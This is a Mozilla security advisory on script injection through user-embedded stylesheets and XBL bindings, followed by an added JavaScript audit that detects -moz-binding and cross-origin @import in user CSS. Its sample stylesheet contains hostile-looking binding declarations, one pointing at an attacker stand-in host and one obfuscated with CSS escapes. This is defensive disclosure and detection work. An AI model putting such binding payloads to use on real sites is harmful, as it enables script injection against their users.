Mozilla Foundation Security Advisory 2009-18
Title: XSS hazard using third-party stylesheets and XBL bindings
Announced: April 21, 2009
Reporter: Cefn Hoile
Products: Firefox, Thunderbird, SeaMonkey
Fixed in: Firefox 3.0.9
Web developer Cefn Hoile reported that sites which allow users to embed third-party stylesheets are vulnerable to script injection attacks using XBL bindings. A stylesheet can attach an XBL binding to an element (through the -moz-binding property), and the binding's implementation can carry script that runs in the context of the bound document, so a site that embeds a stylesheet it does not control is effectively embedding script from that source. While this behavior was documented previously, it was determined that this particular risk was not well-understood by some websites. To mitigate this risk Mozilla added a restriction that requires XBL bindings to come from the same origin as the bound document. Sites that accept user-supplied CSS should still treat it as untrusted content rather than as inert styling, since clients older than the fixed versions do not enforce the new restriction.
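As an added example (not code from this advisory or from Mozilla), the following is the kind of check a site that lets users submit stylesheets could run on the CSS text before serving it: it rejects any -moz-binding declaration, including spellings obfuscated with CSS escapes, and flags @import of cross-origin stylesheets whose contents the check cannot see. The function names, the document URL and the sample stylesheet are constructed for illustration.

```javascript
// Added example, not part of MFSA 2009-18 or of Mozilla's code. A server-side
// audit of user-supplied CSS for the XBL binding hazard the advisory describes.
// Function names, the document URL and SAMPLE_CSS are constructed assumptions.

// Drop comments and decode CSS escapes so an obfuscated spelling such as
// "-moz-\62 inding" normalizes to "-moz-binding" before we look for it.
// Comments are removed first so text inside them cannot hide a declaration.
function normalizeCss(css) {
  const noComments = css.replace(/\/\*[\s\S]*?\*\//g, "");
  // CSS escape: backslash + 1-6 hex digits + one optional whitespace,
  // or backslash + any other single character.
  return noComments.replace(/\\([0-9a-fA-F]{1,6})\s?|\\([\s\S])/g, (_, hex, ch) => {
    if (hex === undefined) return ch;
    const cp = parseInt(hex, 16);
    return cp === 0 || cp > 0x10ffff ? "\ufffd" : String.fromCodePoint(cp);
  });
}

// Collect @import targets; both the string form and the url() form are legal.
function importTargets(css) {
  const re = /@import\s+(?:url\(\s*)?(?:"([^"]*)"|'([^']*)'|([^\s;)"']+))/gi;
  const out = [];
  let m;
  while ((m = re.exec(css)) !== null) out.push(m[1] ?? m[2] ?? m[3]);
  return out;
}

// Returns a list of findings; an empty list means the stylesheet passed.
function auditStylesheet(css, documentUrl) {
  const norm = normalizeCss(css);
  const docOrigin = new URL(documentUrl).origin;
  const findings = [];

  // Any -moz-binding declaration is rejected outright: the XBL it points at
  // can contain a <constructor> whose script runs in the bound document.
  const bindingRe = /(?:^|[^\w-])-moz-binding\s*:\s*([^;}]*)/gi;
  let m;
  while ((m = bindingRe.exec(norm)) !== null) {
    findings.push({ kind: "xbl-binding", value: m[1].trim() });
  }

  // A cross-origin @import pulls in CSS this audit never inspects.
  for (const target of importTargets(norm)) {
    let origin = null;
    try { origin = new URL(target, documentUrl).origin; } catch (e) { origin = null; }
    if (origin !== docOrigin) findings.push({ kind: "cross-origin-import", value: target });
  }
  return findings;
}

// Constructed sample of a user-submitted theme: one same-origin import (fine),
// one cross-origin import, one plain binding and one escape-obfuscated binding.
const SAMPLE_CSS = `
/* user theme, constructed sample */
@import "theme/extra.css";
@import url("https://styles.example.net/shared.css");
body { background: #fff; color: #222; }
.widget { -moz-binding: url("https://attacker.example/bind.xml#run"); }
p { -moz-\\62 inding: url(data:text/xml,%3Cbindings%20xmlns%3D%22http://www.mozilla.org/xbl%22%3E); }
`;

const DOCUMENT_URL = "https://forum.example.org/user/42/profile"; // assumed page URL

for (const f of auditStylesheet(SAMPLE_CSS, DOCUMENT_URL)) {
  console.log(`${f.kind}: ${f.value}`);
}
```

The same-origin check on @import mirrors the restriction Mozilla adopted for the bindings themselves; a stricter policy that drops every @import is simpler and loses little for user themes.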